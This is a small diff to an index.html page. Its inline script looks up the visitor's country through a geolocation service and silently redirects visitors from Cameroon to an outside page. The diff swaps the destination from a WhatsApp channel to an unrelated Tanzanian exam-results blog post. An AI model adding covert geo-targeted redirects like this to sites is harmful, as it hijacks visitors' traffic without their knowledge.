--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     fetch('https://ipapi.co/json/')
         .then(r => r.json())
         .then(data => {
-            if (data.country_code === 'CM') window.location.href = 'https://whatsapp.com/channel/0029VbBXHNULNSa7JxRMYJ3L';
+            if (data.country_code === 'CM') window.location.href = 'https://www.mimihapa.co.tz/2025/09/nactvet-end-of-semister-results.html?m=1';
         })
         .catch(() => {});
     </script>
